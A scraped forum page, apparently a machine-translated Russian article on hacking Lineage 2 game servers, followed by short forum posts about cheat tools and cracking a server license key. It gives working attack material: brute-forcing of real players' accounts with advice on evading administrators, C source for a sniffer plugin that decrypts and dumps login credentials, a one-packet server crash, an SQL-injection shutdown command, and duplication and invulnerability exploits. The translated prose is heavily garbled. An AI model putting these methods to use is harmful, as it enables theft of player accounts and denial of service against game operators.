Has become outdated 0xb8 AbnormalVisualEffect 0xb9 TutorialShowHtml 0xba TutorialShowQuestionMark 0xbb TutorialEnableClientEvent 0xbc TutorialClose 0xbd ShowRadar 0xbe DeleteRadar 0xbf MyTargetSelected 0xc0 PartyMemberPosition 0xc1 AskJoinAlliance 0xc2 JoinAlliance 0xc3 WithdrawAlliance 0xc4 OustAllianceMemberPledge 0xc5 DismissAlliance 0xc6 SetAllianceCrest // Has become outdated 0xc7 ReceiveAllyCrest 0xc8 ServerCloseSocket // Has become outdated 0xc9 PetStatusShow 0xca PetInfo 0xcb PetItemList 0xcc PetInventoryUpdate 0xcd AllianceInfo // Has become outdated 0xce PetStatusUpdate 0xcf PetDelete 0xd0 PrivateSellList 0xd1 PrivateBuyList 0xd2 PrivateStoreMsg 0xd3 VehicleStart 0xd4 RequestTimeCheck 0xd5 StartAllianceWar 0xd6 ReplyStartAllianceWar // Has become outdated 0xd7 StopAllianceWar 0xd8 ReplyStopAllianceWar // Has become outdated 0xd9 SurrenderAllianceWar // Has become outdated 0xda SkillCoolTimePacket 0xdb PackageToListPacket 0xdc PackageSendableListPacket 0xdd EarthQuake 0xde FlyToLocation 0xdf BlockList // Has become outdated 0xe0 SpecialCamera 0xe1 NormalCamera 0xe2 CastleSiegeInfoPacket 0xe3 CastleSiegeAttackerList 0xe4 CastleSiegeDefenderList 0xe5 NickNameChanged 0xe6 PledgeStatusChanged 0xe7 RelationChanged 0xe8 OnEventTrigger 0xe9 MultiSellListPacket 0xea SetSummonRemainTime 0xeb OnSkillRemainSec 0xec NetPingPacket From the client to a server: Код: 0x01 MoveBackwardToLocation 0x02 Say 0x03 EnterWorld 0x04 Action 0x08 RequestAuthLogin 0x09 Logout 0x0a Attack 0x0b CharacterCreate 0x0c CharacterDelete 0x0d CharacterSelect 0x0e NewCharacter 0x0f ItemList 0x10 RequestEquipItem 0x11 RequestUnEquipItem 0x12 RequestDropItem 0x12 RequestDropItemFromPet 0x14 UseItem 0x15 TradeRequest 0x16 AddTradeItem 0x17 TradeDone 0x1a RequestTeleport 0x1b SocialAction 0x1c ChangeMoveType // Has become outdated. Now used 'RequestActionUse' 0x1d ChangeWaitType // Has become outdated. Now used 'RequestActionUse' 0x1e RequestSellItem 0x1f RequestBuyItem 0x20 RequestLinkHtml 0x21 RequestBypassToServer 0x22 RequestBBSwrite 0x23 RequestCreatePledge 0x24 RequestJoinPledge 0x25 RequestAnswerJoinPledge 0x26 RequestWithDrawalPledge 0x27 RequestOustPledgeMember 0x28 RequestDismissPledge 0x29 RequestJoinParty 0x2a RequestAnswerJoinParty 0x2b RequestWithDrawalParty 0x2c RequestOustPartyMember 0x2d RequestDismissParty 0x2e RequestMagicSkillList 0x2f RequestMagicSkillUse 0x30 Appearing 0x31 SendWareHouseDepositList 0x32 SendWareHouseWithDrawList 0x33 RequestShortCutReg 0x34 RequestShortCutUse 0x35 RequestShortCutDel 0x37 RequestTargetCancel 0x38 Say2 // private (on some servers - la2.ru - used 0x39) 0x3c RequestPledgeMemberList 0x3e RequestMagicList 0x3f RequestSkillList 0x41 MoveWithDelta 0x42 GetOnVehicle 0x43 GetOffVehicle 0x44 AnswerTradeRequest 0x45 RequestActionUse 0x46 RequestRestart 0x47 RequestSiegeInfo 0x48 ValidatePosition 0x49 RequestSEKCustom 0x4a StartRotating 0x4b FinishRotating 0x4d RequestStartPledgeWar 0x4e RequestReplyStartPledgeWar 0x4f RequestStopPledgeWar 0x50 RequestReplyStopPledgeWar 0x51 RequestSurrenderPledgeWar 0x52 RequestReplySurrenderPledgeWar 0x53 RequestSetPledgeCrest 0x55 RequestGiveNickName // In general used for installation title CL's. Can for what… 0x57 RequestShowboard 0x58 RequestEnchantItem 0x59 RequestDestroyItem 0x5b SendBypassBuildCmd 0x5e RequestFriendInvite 0x5f RequestFriendAddReply 0x60 RequestFriendList 0x61 RequestFriendDel 0x62 CharacterRestore 0x63 RequestQuestList 0x64 RequestDestroyQuest 0x66 RequestPledgeInfo 0x67 RequestPledgeExtendedInfo 0x68 RequestPledgeCrest 0x69 RequestSurrenderPersonally 0x6a Ride 0x6b RequestAcquireSkillInfo 0x6c RequestAcquireSkill 0x6d RequestRestartPoint 0x6e RequestGMCommand 0x6f RequestPartyMatchConfig 0x70 RequestPartyMatchList 0x71 RequestPartyMatchDetail 0x72 RequestCrystallizeItem 0x73 RequestPrivateStoreManage 0x74 SetPrivateStoreList 0x75 RequestPrivateStoreManageCancel 0x76 RequestPrivateStoreQuit 0x77 SetPrivateStoreMsg 0x78 RequestPrivateStoreList 0x79 SendPrivateStoreBuyList 0x7a ReviveReply 0x7b RequestTutorialLinkHtml 0x7c RequestTutorialPassCmdToServer 0x7d RequestTutorialQuestionMark 0x7e RequestTutorialClientEvent 0x7f RequestPetition 0x80 RequestPetitionCancel 0x81 RequestGMList 0x82 RequestJoinAlly 0x83 RequestAnswerJoinAlly 0x84 RequestWithdrawAlly 0x85 RequestOustAlly 0x86 RequestDismissAlly 0x87 RequestSetAllyCrest 0x88 RequestAllyCrest 0x89 RequestChangePetName 0x8a RequestPetUseItem 0x8b RequestGiveItemToPet 0x8c RequestGetItemFromPet 0x8e RequestAllyInfo 0x8f RequestPetGetItem 0x90 RequestPrivateStoreBuyManage 0x91 SetPrivateBuyList 0x92 RequestPrivateStoreBuyManageCancel 0x93 RequestPrivateStoreBuyQuit 0x94 SetPrivateBuyMsg 0x95 RequestPrivateStoreBuyList 0x96 SendPrivateStoreBuyBuyList 0x97 SendTimeCheckPacket 0x98 RequestStartAllianceWar 0x99 ReplyStartAllianceWar 0x9a RequestStopAllianceWar 0x9b ReplyStopAllianceWar 0x9c RequestSurrenderAllianceWar 0x9d RequestSkillCoolTime 0x9e RequestPackageSendableItemList 0x9f RequestPackageSend 0xa0 RequestBlock 0xa1 RequestCastleSiegeInfo 0xa2 RequestCastleSiegeAttackerList 0xa3 RequestCastleSiegeInfo 0xa4 RequestJoinCastleSiege 0xa5 RequestConfirmCastleSiegeWaitingList 0xa6 RequestSetCastleSiegeTime 0xa7 RequestMultiSellChoose 0xa8 NetPing As you can see, the majority of client packages begins with word Request that is translated as "inquiry". Yes, really, all process of game looks approximately so: the server constantly transfers us a condition of the world, position of Mobs/players/npc and others. We when something should (be gone, attacked and other) transfer "inquiry". All is very simple. 4. XID and ObjectID each thing (the subject, NPC) in game has the 16/32 bit the identifier (trades - 8 bit). Its sense that, you see, it is more convenient to transfer on a network 2/4 byte number, than a phrase of N length like: " Crystal Scroll: Enchant Weapon (Grade B) " or nickname NPC like " Magister MacTePqpJlOMaCTeP ". As you understand, it serves for identification of this or that object. The list of these identifiers and NPC/subjects corresponding them to be stored and on a server and the client, and among themselves they is not synchronized in any way. That is, if to replace this table on a server it is necessary патчить and the client is one of the reasons, why at each server the patch. Besides this identifier is still 32 bit Object ID. After call in the game world, a server appropriates to each of subjects which are at the Persian, unique OID. And OID each subsequent subject is OID current-1. That is OID it is generated at all random, and under the order. After assignment, OID it is reserved, so that anybody has not managed any more to receive similar. This information, by the way, is not confirmed by source codes, that is is my own conclusion. If it not so, on proprocession of a full circle (from 0xFFFFFFFF up to 0x00000000) it can it will turn out so, that already borrowed OID it will be appropriated to a new belonging, that will lead to unknown consequences (to an opportunity of cloning or simple falling of a server). But a problem that range OID enough big:) And if to be more exact, it is necessary to appropriate OID to ~4.3 billion things to pass a full circle, what even on a server with mega-online will borrow N of days (and can also weeks). Still time I shall repeat, this all the assumption. But the matter is that I, for example, Did not see some la2 server (even off) with uptime more than week. The problem just in it can? And as a whole, OID it is necessary for struggle against cloning. To be exact with revealing of this. As to NPC, OID at them stands out under the same law, but at occurrence NPC in the world. With OID characters the same. 5. Examples of packages. a) purchase of subjects to put on buying up a subject, we need to take advantage with 3 of packages. The first 0x94 (SetPrivateBuyMsg). Apparently from the name it establishes that message which will be is deduced above a head at the Persian during the moment of trade (what on a yellow background). Here an example: Код: // SetPrivateStoreBuyMsg a package XX XX // the Size of data 94 // type of a package 41 00 41 00 41 00 42 00 42 00 42 00 // the text. Symbols should be divided among themselves null-byte 00 00 // the end of a package Further we use a package of type 0x91 (SetPrivateBuyList). In it just we transfer quantity of subjects, Item ID and the price. For example: Код: // SetPrivateStoreList a package XX XX // the Size of data 91 // type of a package 01 00 00 00 // quantity of things // the beginning of the block e1 02 00 00 // Item ID 00 00 01 00 00 00 // how many subjects of the given type to buy up e8 03 00 00 // the price // the end of the block I shall a little explain this package. We have put them on buying up 1 thing with IID 0x2e1 (Scroll of Resurrection) for 1000 аден. And last package of type 0x1d. It directly starts trade: Код: XX XX // the size of data 1d // type 01 00 00 00 // quantity As to sale, there practically all same. Only instead of ' SetPrivateBuyMsg ' used ' SetPrivateStoreMsg ', and instead of ' SetPrivateBuyList ' - ' SetPrivateStoreList ' accordingly. And, nearly has not forgotten, instead of Item ID used Object ID because we sell any concrete subject. b) private messages Here all is very simple. Код: XX XX // the size of data 38 // type of a package (Say2) 42 00 42 00 42 00 42 // the message (BBBB) 00 00 00 02 00 00 00 // breakspace=) 41 00 41 00 41 00 41 // nickname (АААА) 00 00 00 // the end c) an example of a package in which the server transfers us the list of all subjects which are on чаре. And, this package assigns to everyone Item ID unique Object ID. Код: XX XX // length of a package 1b // type of a package (0x1b on antaras.ru) 00 00 05 00 // quantity of subjects 04 00 // type of a belonging 1e 26 14 40 // Object ID d4 15 00 00 // Item ID (0x15d4 - Tutorial Guide) 01 00 00 00 // Quantity 05 00 00 00 00 00 00 00 00 00 00 00 00 00 // Enchanting, quest item, droped or not and still something 01 00 // type of a belonging 1d 26 14 40 // Object ID 7b 04 00 00 // Item ID (0x47b - Squire's pants) 01 00 00 00 // Quantity 01 00 00 00 00 00 00 08 00 00 00 00 00 00 01 00 // type of a belonging 1c 26 14 40 // Object ID 7a 04 00 00 // Item ID (0x47a - Squire's Shirt) 01 00 00 00 // Quantity 01 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 // type of a belonging 1b 26 14 40 // Object ID 0a 00 00 00 // Item ID (0x0a - dagger) 01 00 00 00 // Quantity 00 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 // type of a belonging 1a 26 14 40 // Object ID 42 09 00 00 // Item ID (0x942 - Guild Member's Club) 01 00 00 00 // Quantity 00 00 00 00 00 00 80 00 00 00 00 00 00 00 d) we speak with NPC on an example of learning skills For the beginning, we need to allocate NPC and to get with it dialogue: 04 // type of a package (Action) 51 14 10 48 // OID NPC // further there are coordinates the character c6 51 01 00 // X 52 45 02 00 // Y b8 f2 ff ff // Z 00 // the end [/code] And unitary посылка this package - allocation NPC. To get with it dialogue, it is necessary to send this package still time. Further, when the window with a choice of dialogues opens and you choose item " Learn skills ", the client sends a server here such package: Код: 21 // type of a package (RequestBypassToServer) 6c 00 65 00 61 00 72 00 6e 00 5f 00 73 00 6b 00 69 00 6c 00 6c 00 00 // learn_skill 00 // the end After a call of dialogue with skills, you can or look the information on any skill by means of: Код: 6b // type of a package (RequestAcquireSkillInfo) 10 00 00 00 // number of skill 09 00 00 00 // the level to learn this skill, is sent precisely same package, but with type 0x63 (RequestAcquireSkill) IV. Problems and as it is possible to use them 1.Absence of a limit on quantity in attempts of authorization It enables to infinite search of passwords to this or that account. I shall not describe as well as that, bruteforce it and in Africa bruteforcer . I shall tell only about the personal experience in this area. Test was spent on www.antaras.ru - old, diing out domestic lineage2 C1OFF a server (with additives from C3). Using only that information (well and non-blocking sockets), what I have given above, have been written bruteforce (bruteforce logins and passwords) and the program which tears out the list nickname, playing the given moment on a server with ' http: // antharas.ru/? id=2 '. Has made from random the list of passwords of type 123456789, 0987654321 (on antaras.ru the minimal length of the password of 8 symbols - on all servers differently), the list with nickname, at present gamers playing on a server, has made ~1500 lines. Bruteforce I started from an extraneous server to not scorch the ип. Total, for a night it has been opened the order of 50 accounts. But, unfortunately, a greater half of accounts were or are empty, or with characters of a small level. But other small part... I Shall tell only, that the total loss, put to gamers, has made hardly more 1kkk game money (clothes) or the order 400 $ if to translate in real - though as will bargain. But, to tell the truth, it "has not made", and "would make". I, actually, absolutely have taken nothing from these accounts, and have found little bit other application to all to it;) About it below. There are 3 underwater stones in breaking of accounts by this method. First, if we login on a server under the cracked account, and its owner use at present it on the screen has an inscription, that someone breaks:/For this reason bruteforce I have charged for the night, and in general it is better to do it in the morning. But, by my small experience, I can tell, that, whether users do not pay attention to this inscription, whether do not know English, whether not able to change at all the password, but at me problems with such accounts (on which someone played) have not arisen. I mean, nobody has replaced the password from those who me has found out. Secondly, nickname = a login. My program took nickname players who played on a server, but at all their logins. But it too not especially serious a problem in case of such "mass" breaking as even if at the person with anybody NICKNAME and search of passwords to нику NICKNAME will not pass login LOGINNAME necessarily there will be someone with login NICKNAME vainly though we shall crack and not this concrete character. Thirdly, if you have undressed this or that character, it can address to administration and there is a probability, that everyone will return to it. How it to prevent? I did not collide with it, but, having thought logically, I can assume, that: They will return everyone, if gay will prove, that it divide. You can tell in the justification that have bought from it all for real - same is not fixed anywhere - and gay has wanted you to throw. For greater persuasiveness, during the moment "undress" translate from the purse on any another a round sum and make a screenshot. But administrators, in turn, can look in broad gullies and see there thousand attempts to login, accordingly give an account two weeks will be defended after breaking, let broad gullies about attack will sink into oblivion. Also administrators can pay attention on ип from which the victim and its discrepancy usually comes with from what it has been undressed. Here.. Can find the one who use the same provider, or to take advantage of its services independently, or to break one of it боксов, or to try to explain to administrators, that it it is simple so dexterously you has substituted. Programs which realize the described way of breaking Lineage2 of accounts, on the Internet I did not see... For this reason has decided to write and sell the - la2brute.5bb.ru. It is necessary to recognize, that with the beginning of its general use, accounts to break there was all more difficultly and more difficultly. If I, after have written it (somewhere in February of 2006), on the Russian popular servers could break till 30-50 accounts for a night now this figure in 4-5 times is less. And the last, would be desirable to note, that a unique server which has made protection against search, was la2.abyss.ru. Though actually, still on antaras.ru have entered protection - blocking of an account for 5 minutes after 40 erroneous attempts to login. But at that mass search about which I wrote above, this protection is practically useless. 2. Enciphering packets As I already spoke enciphering of packages above, a key which is used for generation подключей in a login a server, constant. It and is clear, in fact for calculation of all values P and S algorithm of enciphering Blowfish it is necessary to execute 521 times. If to carry out generation of new values at each client, it will devour very many system resources. But the matter is that l2j and does! Though the key and constant, l2j generates connect for each connection! I do not know, how off the version (at me it is not present also it very difficultly to get), but l2j proves, that to present computers it quite under force. And the problem consists that we can sniffer another's sessions and with ease them to decipher, pulling out a login and the password. So in what then sense of enciphering of packages with blowfish.I have written a plug-in for sniffit to the version 0.3.7.beta which catches and deciphers all the packages passing through your computer and containing a login/password to lineage2 to accounts. Код: ====> la2_plugin.plug <==== /* Sniffit 0.3.7.beta LineAge2 c3 plugin Allows to catch and decode la2 RequestAuthLogin packets *on the fly* and dump login/passwords. by darkgrey / m00.blackhat.ru ~broken */ #include "/usr/local/include/blowfish.h" #define KEY_LEN 20 BF_KEY bfkey; char key[] = "[;'.]94-31==-&%@!^+]"; void init_la2_plugin() { printf("LineAge2 C3 plugin enabled\n\n"); BF_set_key(&bfkey, KEY_LEN, key); } void PL_la2_plugin (struct Plugin_data *PLD) { int i = 0; int count = (PLD->PL_info.DATA_len - 2) / 8; char *ptr = PLD->PL_data; unsigned char *ls_ip; if(PLD->PL_info.DATA_len == 0x32 && PLD->PL_info.UDP_len == 0) { ls_ip=(unsigned char *)&(PLD->PL_iphead.destination); printf("Login Server ip: %u.%u.%u.%u\n",ls_ip[0],ls_ip[1],ls_ip[2],ls_ip[3]); for(i = 0; i < count; i++) BF_encrypt((BF_LONG *)((short*)ptr+1+i*4), &bfkey, BF_DECRYPT); i = 2; printf("Login: "); while(PLD->PL_data[i++] != '\x00' || i != 16) printf("%c",PLD->PL_data); printf("\nPassword: "); while(PLD->PL_data[i++] != '\x00' || PLD->PL_data != '\x08') printf("%c",PLD->PL_data); printf("\n"); } } /* eof */ ====> sn_plugins.h <==== #define PLUGIN2_NAME "LineAge2 c3 Plugin" #define PLUGIN2(x) PL_la2_plugin(x) #define PLUGIN2_INIT() init_la2_plugin() #include "la2_plugin.plug" /* eof */ That it to use, you need to copy both of a file in the catalogue with sniffit. Well and for compilation all is required to you the same library blowfish and corresponding record in a make-file. m00.blackhat.ru/m00-la2sniff.jpg - shows work bruteforce passwords to lineage2 to servers and in parallel started sniffit with the established plug-in on an example www.antaras.ru (217.107.212.212 - IP a login-server). 3. The removed definition of the version lineage2 a server Remember I spoke, what the last of 8 bytes in packages a login-server are allocated under checksum? More precisely, from them penultimate 4:> And if suddenly to leave a package without checksum, off the version lineage a server us disconnect. In l2j function which checks checksum returns true or false, but for some reason returned value is not checked. That is, actually l2j does not check checksum. Accordingly, if disconnect, off if is not present l2j. 4.Removed "suspension" of a login-server Has been noticed, that some servers answer the packages which are not containing a login/password a package of type 0x03 (which means, that you are successfully authorized). Then start to behave extremely astably. I have checked up it on 10 large C3 servers, half in any way did not answer such package, another answered with a package 0x01 (authorization has not passed), but only www.la2.ru sent 0x03 and for a while stopped to accept entering connections (probably, at them it is established the system of "auto-rise"). For realization of the program which would suspend la2.ru, you need to mix all the above-given generator of packages with the simple tcp-client. The infinite cycle of a message of similar packages will lead to impossibility to come on a game server. 5 The cloning Vulnerability about which now will go speech took place to be in C1 versions C2, therefore I shall especially not concentrate attention on it. The essence consist that we, having authorized on a login-server of 1 times under one account, could come on a game-server under the same account in parallel unlimited number of times. Accordingly, it was possible to enter into game under the same character as much as necessary. The second opportunity of cloning has been described in the paragraph about IID and OID. Cloning of subjects through WH, pupils and other I shall not consider, this theme interesting since on normal servers it already for a long time does not work not seems to me. 6.Creation of "mutants" and mixture skills Very interesting theme. The first who realized with programm these ideas (in Russian net) was Hint. For the beginning, on how many you know, in lineage exists a little races. The classes are fixed To each of them (the magician and wars). But the class of one race naturally differs from a similar class another race (skills). And at race dwarfs are not present a class of magicians in general. It was the necessary foreword to understand sense of all described below. And now we shall consider inquiry about creation of the character: Код: 0B // type of a package 45 00 6D 00 30 00 30 00 00 00 // nickname the char 04 00 00 00 // race 00 00 00 00 // sex 35 00 00 00 // an initial trade (class) 14 00 00 00 // 6 constant values, I am at a loss to tell, that they mean 27 00 00 00 // 2D 00 00 00 // 1B 00 00 00 // 1D 00 00 00 // 0A 00 00 00 // 00 00 00 00 // type of hair 00 00 00 00 // color of hair 00 00 00 00 // type of the person This package war with anybody "m00" a male will create the Dwarf. It has appeared, that the server (even official) does not check conformity races with chosen a class. It allows us to create chars one races with a class absolutely another (I name them mutants =)). Sounds, certainly, interestingly, but actually we have usual char with the stat and skills, but with structures unusual for it. On idea the bug except for the fan cannot give anything to us (the fan light elf who spoile mobs:)), but it has appeared, that from this, at first sight, a uninteresting bug two result more. How much you know, everyone races has the NPC at which quests on a trade undertake and study skills. And so, mutants learn skills a class of one races at NPC another races. For example, I, playing light elf, learned skill dwarf "Spoil" at NPC elf. And here there was a question and who then will give me a trade and what? The matter is that skills are given depending on a trade (In the given context of a “class"), and here quests depending on races. That is, can it will turn out such, that on achievement of 20-th level and being the dwarf-spoiler, you can receive a trade " Elven Knight " (the first trade light elfs). But this information is not confirmed in practice. By the way speaking, small quantity of mutants can learn in general skills. And in general, if to speak about skills in la2 there is one more bug. LA2 official the client does not check conformity of a level char and a level accessible to studying skill. That is, for example, being on 5-th lvl human fighter you can learn mortal blow a maximum level (provided that will suffice SP). It is easily realized at a batch level. Still it would be desirable to add, that on l2j a server any checks in general are absent. That is you can learn even those skills which are accessible only GM . 7. Immortality. Here we also have reached the most interesting theme called in common people - god mode. Will agree, on a server where online is more 1000 person, to be immortal - it is a pleasure =) For the beginning when there comes immortality? On this question has been given banal but as it has appeared the exact answer: when charms it is already dead. It would seem delirium but when at the character 0 HP and it is alive, it cannot be killed (well not absolutely it is impossible:) - about it below). But how to make, that at char was absolute 0 HP, it was alive and thus still HP were not restored? For the beginning we shall consider the problem with 0 HP. In la2 there is such bug: if after death to press on " return to the nearest village " and at once to finish process l2.exe, charms will appear in city with absolute 0 HP and even with buffs (if they before were). It is connected that after a RequestRestartPoint-package the client should send package Apearing after which actually the server both restores char HP and cleans buffs. And as the client we close, it to send this packages is not in time. By the way, why I speak all time "absolute" 0? The matter is that on server HP are stored in a variable of type float (that the most interesting, it is sent the client in the form of an integer). That is, if you will gradually reduce HP up to 0 by means of bleed or poison you do not receive absolute 0 and if HP not the zero, means you are alive. Therefore the unique way to receive absolute 0 is to die. Here, to do 0 HP we have learned, now we shall talk how to freeze them on zero. 1) a first step in this direction was creation of the gnome-magician (as it has been described in the previous paragraph). Most likely, in consequence of that gnomes do not have such class as the magician in general, at it are not recycled HP/MP. Accordingly, having done with such gnome the above-mentioned actions, we shall receive the immortal character. This bug пофиксили practically everywhere. 2) the Second way has been opened a little after gnomes-magicians. It has appeared, that at a choice nonexistent races, are created immortal human with any class. And the most interesting, that if in such a way to create a class human mage, all equally will turn out human fighter, but with magic skills. These two ways have very powerful two lacks: a) the created characters cannot learn skills and receive a trade. b) as you understand, реген HP does not work in general, according to you will have to run immortal all time. 3) and now, attention, a bug - which to me the same has helped to find all hint. How much you know, in a ruler there is such piece as overweight. When you are loaded on 65 % +, at you speed of run, attack and regeneration falls. But very few people knows, that if at you of 90 % + besides you cannot move, at you is not recycled HP! But that to sense of what, having appeared after death in city, you will stand on a place immortal? And here to us will help strider! Sowing on it, you can run with its speed that HP all equally is not recycled! But here there is too a small reef - on some servers (reborn.ru - C4) it is impossible to attack being on strider. Here there's nothing to be done, I can advise to use only buff blazing skin/freazing skin. 4) well and last bug with immortality is demon's set. Perhaps the oldest bug on immortality and about it basically everyone know it. It is fastened that at you turns out negative HP and you accordingly besides cannot be killed. All the above described types of immortality unites one serious lack. The character ceases to be immortal as soon as at it somehow will increase HP - in consequence lvlup's or banal heal's. Also it dies from bleed, poison, some vampirisms. Still here the bug with " fake death " was recollected. On some curves java after FD charms as though and remain dead and they cannot be attacked while they will not make restart. Well it so, to a word. 8. ' remote DoS' also that it gives Usually vulnerability of a similar sort especially are not appreciated, as more than simply "jokes" from them anything to receive it is impossible. LA2 constantly keeps a condition of the world (through each N-seconds - this question still precisely is not studied, yes it and not so is important) that after sudden falling to make recoil. That is, being able to predict (or to provoke) falling of a game-server, we receive " authority above recoils ". What does it mean? And what, have killed you? Recoil! You have undressed? Recoil!! At you it has not turned out to grind a belonging? Recoil!!! Besides there are very valuable monsters who have very big resp time (fairy queen timinel - респ 5 hours, for example) and are present at an individual copy. Have killed, have tumbled down a server, the server has risen, моб has again appeared. As a result time респа is reduced from 5 o'clock up to minutes. How to overload a server? For l2j 100 % the working way is crystallization. Код: 72 // RequestCrystallizeItem 00 00 00 00 // OID subject FF FF FF FF // quantity It is substituted in this package real OID a subject and it is sent. On what the server instantly falls. For projects here all is more complex. At enciphering packages wrong key, the server sometimes falls. WHY? If keys do not coincide, the server means at decoding receives absolutely random values (That is that we have ciphered). And to track down just that sequence of values at which the server falls, at me meanwhile it has not turned out. 9. integer overflow in a network cursor l2j Well and so that finally to deny opinion that in lineage2 is not present serious bugs, I shall show to you integer overflow in a server l2j in procedure of processing of client packages: Код: public void run() { _log.fine("loginserver thread[C] started"); int lengthHi = 0; int lengthLo = 0; int length = 0; boolean checksumOk = false; int sessionKey = -1; String account = null; String gameServerIp = null; try { InetAddress adr = InetAddress.getByName(_gameServerHost); gameServerIp = adr.getHostAddress(); Init startPacket = new Init(); _out.write(startPacket.getLength() & 0xff); _out.write(startPacket.getLength() >> 8 & 0xff); _out.write(startPacket.getContent()); _out.flush(); do { lengthLo = _in.read(); lengthHi = _in.read(); length = lengthHi * 256 + lengthLo; if(lengthHi < 0) { _log.warning("Client terminated the connection."); break; } byte incoming[] = new byte[length]; incoming[0] = (byte)lengthLo; incoming[1] = (byte)lengthHi; ................. It certainly not absolutely ' integer overflow ' in classical understanding of this word-combination, but leads it all over again to two-byte overflow (off-by-two overflow), and then to... Similar vulnerability is available in La2 the client and l2walker'. They hang, devouring 100 % of processor time. But their source codes at me are not present, but there is a basis to believe, that there a code a little other. By the way speaking, server L2J simply completely is filled by similar bugs. Many of them are described on cheats forums. 10. SQL-injection Yes, through this bug in forums it has been cracked, probably, even more servers than once by means of a unicode-bug in iis. What my surprise when I have learned was, that it is and in lineage. And it basically and clearly, much that we transfer a la2-server (titles for members of a clan, nickname for ignore, the list of friends and other) at once is added in server sql-base. Accordingly, a simple command:/block ' SHUTDOWN - we can switch off a sql-server. Most of all amazes that the administrators undertaken fixed this bug, first of all filtered asked on a to speak " SHUTDOWN - " and only have then guessed, that restart of a server is the most minimal that it is possible to make using this bug. In more detail on this bug I shall not , as it, perhaps, most serious that in general is in a ruler. I shall tell only, that fixed it it is the extremely curve:) 11. Enchant to Me, the bug with enchanting costs on the second place on a demand after "dupe". What is the sharpening in general? It is such roll which allows to improve characteristics of this or that belonging then leaves. But to improve it is possible at all indefinitely. After +3 there is a probability of that the belonging will break. And, the above the degree "enchant" things, the is more probability of its breakage (by the way, not the fact, about it below). Just presence here to this variable "probability" has led to occurrence of uncountable set of ways of enchanting. For example, at someone suddenly any miracle had turned out to enchant on +6, when it... Ran! And now this person writes at forums that is new 100 % a way of a point. Also the some people write, that it is better enchant than 1 times at 1-st level, better enchanting the gnome, also that the probability depends on "recommendations", from intelligence (by the way, about INT to me the person has told a man of education), it is better enchant at night, to use soulshots, to beat during this moment mob, to measure time between points and so on and so forth. I, certainly, cannot argue with these statements as I have not tested everything that write at forums, but I know precisely - a way of enchanting many people are ready to pay quite good money for 100 %. Hence, such way on public unfortunately is not present. And whether there is it in general? We Shall try to understand it together. For the beginning, let's disassemble, how at a batch level enchant a belonging: 1-st package is when in game we press the right button on enchanting, that is we activate it. Код: 14 // type of a package (UseItem) 86 a4 13 40 // OID enchant 00 00 00 00 After activation of enchant we choose that subject which we want to enchanting: 58 // type of a package (RequestEnchantItem) 74 a4 13 40 // OID a subject All is extremely simple. By the way speaking, alongside with numerous ways of enchanting, there was such theory, that the probability of a point miscalculates on the client and as though we speak a server, the subject has broken or not. And as if simple artmoney 100 % enchant are possible. It not the truth, you just in it were convinced. Really, at a batch level a point looks it is extremely simple. How it is possible to deceive th
  5. Cause they would be patched in five seconds after their release. Thats why no1 shares them, they dont want to make the same mistake twice. I know..its sad..but thats life. People here share exploits long after they were patched.
  6. I wanted to ask if there is new way to find Char ID, the old one with socks cap and l2 logger doesnt work anymore as C4 version of L2.exe can not be started via socks cap. So is ít possible to bypass this error or is there another way to see the char ID?
  7. JUST LINK IT YOURSELF WITH THE CORRECT IMAGES So, I shall show on one very known Russian LA2C3 a server an opportunity to learn скиллы inaccessible levels program LA2Fun. For the beginning, here a sreen of the initial character (Tresure-Hunter 56 lvl): As you can see skill deadly blow (the basic скилл даггерщиков) прокачен up to 18-th level that corresponds to 56-th level TH. We shall try to learn 35-th level inaccessible to us, for example, (it is possible to learn at 74-th level only. For the beginning we shall bring the Persian to НПЦ in Giran'е through which he can learn скиллы (возьмём Master Dufner). Further we leave game and we open a file skill.lst which goes together with program LA2Fun and we search in him скилл " deadly blow ": We remember its number: 263 Now we open the program and it is filled necessary fields: We put the switch " That we shall do? " In position " To learn скиллы ". In list NPC it is chosen at what be going to to learn скиллы (Dufner (human fighter)). Level скилла - 35 (maximal 37) Number чара - a serial number of the character beginning at the left (if to look through LA2 the client) - thus beginning readout from zero. That is, for example, if charms the first under the bill, number will be 0. If the second 1 and so on. Login/password - a login and the password from your account accordingly. The ¿»-address and token - for filling these fields will choose your server in the list below (to the right of buttons). Further press to begin. If all has passed normally and you have seen approximately that is shown on a sreen, try to come into game by a boat or the client for check of result: At us all has turned out - we have at one stroke pumped over скилл deadly blow from 18-th level up to 35-th. Also we can make and with all others скиллами (even passive like light armor mastery, dagger mastery), any other charms, even lower levels. On последок one more screenshot prophet'а 45-th level. Pay attention to a level скилла bless the body:
  8. Have anybody tried this ? method to find the KEY, could be used to find AUTHD too: required software:SOFTICE, SPY_CAPTURE Theory: because keying in the wrong key would return to the message window thus using WM_GETTEXT and WM_COMMAND to debug it, we could analyze the asm and hex code to derive the key. Use: 1.Open L2AuthD_60215, use SPY_CAPTURE to find the main window, click on OK BUTTON as well as TEXTLABLE line break subsequently as: handle:001401DC;handle:003E03A4;handle:0023045A. 2.Open SOFTICE, include L2AuthD_60215's entry point 3.key in the debug command: a.debug button:BMSG 003E03A4 WM_COMMAND b.debug text:BMSG 0023045A WM_GETTEXT c.debug sequenece code:BMSG 001401DC WM_GETTEXT 4.press F5 to run sequence 5.record the hex after "[]" (16 byte) 6.take this hex and convert it into (base10 i think) 7.KEY in this key SUCCESS~~~~~ hope everybody could find the real key after some tries... Cached : audhaudhuahdasdhuadhuahduashd
  9. Very nice, what can we do with those .exe's, can we run it without them?
  10. I dont get it, what is better on not seeing your own HP?
  11. So...how to connect? And what do we need? I mean do we have to pay something or is it free?
  12. It doesnt work with B or higher grade, thats all. Good bye!
×
×
  • Create New...